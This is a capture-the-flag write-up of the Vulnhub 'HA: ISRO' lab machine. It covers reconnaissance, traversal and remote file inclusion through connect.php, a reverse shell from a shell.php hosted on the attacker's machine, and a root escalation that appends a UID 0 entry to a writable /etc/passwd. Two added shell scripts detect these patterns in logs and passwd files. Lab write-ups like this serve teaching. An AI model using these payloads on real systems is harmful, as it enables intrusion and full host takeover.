Vulnhub: the ISRO machine, detailed testing process and lessons learned
Isro
Author: jason_huawen
Machine information
Name: HA: ISRO
Address:
https://www.vulnhub.com/entry/ha-isro,376/
Identify the target host IP address
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# netdiscover -i eth1 -r 192.168.187.0/24
Currently scanning: 192.168.187.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.187.1 00:50:56:c0:00:01 1 60 VMware, Inc.
192.168.187.139 00:0c:29:eb:ac:e1 1 60 VMware, Inc.
192.168.187.254 00:50:56:fd:07:6a 1 60 VMware, Inc.
Using the netdiscover tool bundled with Kali Linux, the target host IP address is identified as 192.168.187.139.
NMAP scan
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# nmap -sS -sV -sC -p- 192.168.187.139 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-23 21:42 EST
Nmap scan report for localhost (192.168.187.139)
Host is up (0.0017s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:d2:c5:ec:a5:f9:c4:f3:8a:70:f6:df:ac:ad:a9:24 (RSA)
| 256 34:ae:7a:6f:94:93:25:de:39:e3:14:b0:61:80:34:54 (ECDSA)
|_ 256 5e:52:99:70:f4:d1:c0:f6:6e:62:30:94:ee:47:be:59 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: ISRO - Govenment of India
|_http-server-header: Apache/2.4.29 (Ubuntu)
65534/tcp open ftp vsftpd 3.0.3
MAC Address: 00:0C:29:EB:AC:E1 (VMware)
Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.47 seconds
The NMAP scan shows the target has three open ports: 22 (SSH), 80 (HTTP) and 65534 (FTP).
Getting a shell
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# ftp 192.168.187.139 65534
Connected to 192.168.187.139.
220 (vsFTPd 3.0.3)
Name (192.168.187.139:root): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> quit
221 Goodbye.
The target host does not allow anonymous FTP access.
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# nikto -h http://192.168.187.139
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.187.139
+ Target Hostname: 192.168.187.139
+ Target Port: 80
+ Start Time: 2023-02-23 21:46:23 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 16e3, size: 593fe0a9b796d, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2023-02-23 21:47:36 (GMT-5) (73 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# gobuster dir -u http://192.168.187.139 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.187.139
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html,sh,txt
[+] Timeout: 10s
===============================================================
2023/02/23 21:48:24 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 5859]
/img (Status: 301) [Size: 316] [--> http://192.168.187.139/img/]
/connect.php (Status: 200) [Size: 0]
/server-status (Status: 403) [Size: 280]
The /img directory contains a jpg image; download it locally for analysis:
┌──(root💀kali)-[~/Desktop]
└─# cd ~/Vulnhub/Isro
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# ls
aryabhata.jpg nmap_full_scan
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# steghide extract -sf aryabhata.jpg
Enter passphrase:
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# stegseek aryabhata.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: ""
[i] Original filename: "flag.txt".
[i] Extracting to "aryabhata.jpg.out".
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# ls
aryabhata.jpg aryabhata.jpg.out nmap_full_scan
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# cat aryabhata.jpg.out
Aryabhata Flag:{e39cf1cbb00f09141259768b6d4c63fb}
┌──(root💀kali)-[~/Vulnhub/Isro]
└─#
Visit the URL
http://192.168.187.139/bhaskara.html
The source of the returned page contains a comment:
/p>
</div>
<!-- End Page Content -->
</div>
<!-- Footer -->
<!--BHASKARA LAUNCH CODE: L2JoYXNrYXJh -->
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# echo 'L2JoYXNrYXJh' | base64 -d
/bhaskara
Decoding gives a path, /bhaskara; fetching it from the server saves a file named bhaskara:
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# ls
aryabhata.jpg aryabhata.jpg.out bhaskara nmap_full_scan
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# file bhaskara
bhaskara: data
Read it with the last command.
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# wfuzz -u http://192.168.187.139/connect.php?FUZZ=id -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 0
No results.
Try a different payload:
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# wfuzz -u http://192.168.187.139/connect.php?FUZZ=../../../../../etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.187.139/connect.php?FUZZ=../../../../../etc/passwd
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000759: 200 28 L 38 W 1455 Ch "file"
This example shows that when testing for LFI, the fuzzing payload sometimes needs to be a command such as id and sometimes a file path.
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# curl http://192.168.187.139/connect.php?file=../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
isro:x:1000:1000:isro,,,:/home/isro:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
ftp:x:107:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
mysql:x:108:115:MySQL Server,,,:/nonexistent:/bin/false
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# curl http://192.168.187.139/connect.php?file=../../../../../home/isro/.ssh/id_rsa
No private key file exists.
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# curl curl http://192.168.187.139/connect.php?file=http://192.168.187.130:8000/test.txt
curl: (6) Could not resolve host: curl
jason,hello
A remote file inclusion vulnerability exists, so next work on getting a reverse shell:
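The two payload shapes used against connect.php above (a traversal sequence and a remote URL in the file parameter) are also what a defender looks for in the web server's access log. The following POSIX shell filter is an added example, not part of the original write-up: it runs over a constructed sample of Apache combined-format log lines, flags either pattern, and lists the source addresses. The log entries and the function names are constructed for this illustration; in real use the filter would be pointed at /var/log/apache2/access.log.

```shell
#!/bin/sh
# Added example (not from the original write-up): flag access-log requests
# whose query string carries a path-traversal sequence or a remote URL, the
# two payload shapes used against connect.php in the write-up above.

# Constructed sample of Apache combined-format access log entries.
SAMPLE_LOG="$(cat <<'EOF'
192.168.187.130 - - [23/Feb/2023:21:55:01 -0500] "GET /connect.php?file=../../../../../etc/passwd HTTP/1.1" 200 1455 "-" "curl/7.85.0"
192.168.187.130 - - [23/Feb/2023:21:56:10 -0500] "GET /connect.php?file=http://192.168.187.130:8000/test.txt HTTP/1.1" 200 12 "-" "curl/7.85.0"
192.168.187.50 - - [23/Feb/2023:21:57:30 -0500] "GET /index.html HTTP/1.1" 200 5859 "-" "Mozilla/5.0"
192.168.187.50 - - [23/Feb/2023:21:58:02 -0500] "GET /img/aryabhata.jpg HTTP/1.1" 200 84213 "-" "Mozilla/5.0"
192.168.187.130 - - [23/Feb/2023:21:59:44 -0500] "GET /connect.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1455 "-" "curl/7.85.0"
EOF
)"

# Print log lines whose request target contains either
#   "../" or its URL-encoded form "..%2f" (traversal, local inclusion), or
#   a parameter value that starts with a URL scheme (remote inclusion).
# Reads the files given as arguments, or stdin when none are given.
find_inclusion_attempts() {
    grep -Ei '"[A-Z]+ [^" ]*(\.\./|\.\.%2f|=(https?|ftp|php|data):)' "$@"
}

# Number of flagged lines in the constructed sample.
count_inclusion_attempts() {
    printf '%s\n' "$SAMPLE_LOG" | find_inclusion_attempts | wc -l | tr -d ' '
}

# Distinct client addresses that sent flagged requests (field 1 of each line).
inclusion_source_ips() {
    printf '%s\n' "$SAMPLE_LOG" | find_inclusion_attempts | awk '{ print $1 }' | sort -u
}

# Stand-alone run: show the flagged lines, then a summary.
printf '%s\n' "$SAMPLE_LOG" | find_inclusion_attempts
echo "flagged requests: $(count_inclusion_attempts) from $(inclusion_source_ips | tr '\n' ' ')"
```

The URL-encoded traversal line is included on purpose: a filter that only matches the literal "../" misses the variant most scanners try second, so the pattern covers both spellings. Anything this filter flags from an internal address is worth correlating with the PHP error log, since a successful remote inclusion leaves no error while a blocked one usually does.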
http://192.168.187.139/connect.php?file=http://192.168.187.130:8000/shell.php
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# curl http://192.168.187.139/connect.php?file=http://192.168.187.130:8000/shell.php
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.187.130] from (UNKNOWN) [192.168.187.139] 33540
Linux ubuntu 4.15.0-55-generic #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
19:18:17 up 43 min, 0 users, load average: 0.00, 0.08, 0.41
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$
Privilege escalation
Upload the linpeas.sh script to /tmp on the target host, change its permissions, and run it:
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
Create a password hash and append an entry with it to /etc/passwd:
www-data@ubuntu:/tmp$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
isro:x:1000:1000:isro,,,:/home/isro:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
ftp:x:107:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
mysql:x:108:115:MySQL Server,,,:/nonexistent:/bin/false
www-data@ubuntu:/tmp$ echo 'jason:$6$jjjjj$0KKGbTLponj9XtFgmJfh1TryElTSBf8UXtC9zwMHyJCtycfeT0nCo3F2pzOQzqLMqmK1uLjdQKLzgXXGfeRzH1:0:0:root:/root:/bin/bash' >> /etc/passwd
www-data@ubuntu:/tmp$ su - jason
su - jason
Password: 123456
root@ubuntu:~# cd /root
cd /root
root@ubuntu:~# ls -alh
ls -alh
total 24K
drwx------ 3 root root 4.0K Oct 3 2019 .
drwxr-xr-x 22 root root 4.0K Oct 1 2019 ..
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
-rw-r--r-- 1 root root 956 Oct 3 2019 final.txt
drwxr-xr-x 3 root root 4.0K Oct 1 2019 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
root@ubuntu:~# cat final.txt
cat final.txt
8888888 .d8888b. 8888888b. .d88888b.
888 d88P Y88b 888 Y88b d88P" "Y88b
888 Y88b. 888 888 888 888
888 "Y888b. 888 d88P 888 888
888 "Y88b. 8888888P" 888 888
888 "888 888 T88b 888 888
888 d8b Y88b d88P d8b 888 T88b d8b Y88b. .d88P
8888888 Y8P "Y8888P" Y8P 888 T88b Y8P "Y88888P"
Chandrayaan Flag:{0ad8d59efe7ce5c820aa7350a5d708b2}
!! Congrats you have finished this task !!
Contact us here:
Hacking Articles : https://twitter.com/rajchandel/
Aarti: https://in.linkedin.com/in/aarti-singh-353698114
+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
____________________________________
root@ubuntu:~#
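The condition linpeas reported (a /etc/passwd writable by the web user) and the escalation that followed (an appended entry with UID 0 and an inline hash) can both be caught by a periodic audit of the file. The following POSIX shell script is an added example, not from the original write-up: the sample passwd file, the placeholder hash and the function names are constructed, and in real use the functions would be pointed at /etc/passwd.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit a passwd file for the
# conditions abused above - a file writable by group or others, an account
# besides root with UID 0, and a password field that holds a hash instead of
# delegating to /etc/shadow.  Real use: audit_findings /etc/passwd

# Constructed sample passwd file; the hash is a placeholder, not a real one.
TMP_PASSWD="$(mktemp)"
trap 'rm -f "$TMP_PASSWD"' EXIT
cat > "$TMP_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
isro:x:1000:1000:isro,,,:/home/isro:/bin/bash
jason:$6$jjjjj$PLACEHOLDER_HASH:0:0:root:/root:/bin/bash
EOF
chmod 666 "$TMP_PASSWD"   # reproduce the misconfiguration linpeas reported

# Accounts other than root whose UID (field 3) is 0.
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Accounts whose password field (field 2) is not "x", "*" or locked ("!...");
# anything else is a hash, or an empty field, living in world-readable passwd.
undelegated_password_fields() {
    awk -F: '$2 != "x" && $2 != "*" && $2 !~ /^!/ { print $1 }' "$1"
}

# "yes" if the mode string from ls -l shows a write bit for group or others.
group_or_other_writable() {
    case "$(ls -l "$1" | cut -c1-10)" in
        ?????w????|????????w?) echo yes ;;
        *) echo no ;;
    esac
}

# One line per finding.
audit_findings() {
    for u in $(extra_uid0_accounts "$1"); do
        echo "UID 0 account besides root: $u"
    done
    for u in $(undelegated_password_fields "$1"); do
        echo "password field not delegated to shadow: $u"
    done
    if [ "$(group_or_other_writable "$1")" = yes ]; then
        echo "file writable by group or others: $1"
    fi
}

# Number of findings, for scripting (non-zero means the file needs attention).
count_findings() {
    audit_findings "$1" | wc -l | tr -d ' '
}

# Stand-alone run against the constructed sample.
audit_findings "$TMP_PASSWD"
```

Against the constructed sample the script reports three findings: the extra UID 0 account, the inline hash, and the loose file mode. On a correctly configured host all three functions should print nothing, which is the property a cron job or a file-integrity monitor wants to assert; the mode check is done from the ls mode string rather than with test -w so that it still gives the right answer when the audit itself runs as root.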
Lessons learned
- When I first saw the connect.php file, I felt it was the way in, but after fuzzing its parameter with wfuzz using id as the payload nothing came out; at that point I should also have tried ../../../../etc/passwd.
STRIVE FOR PROGRESS, NOT FOR PERFECTION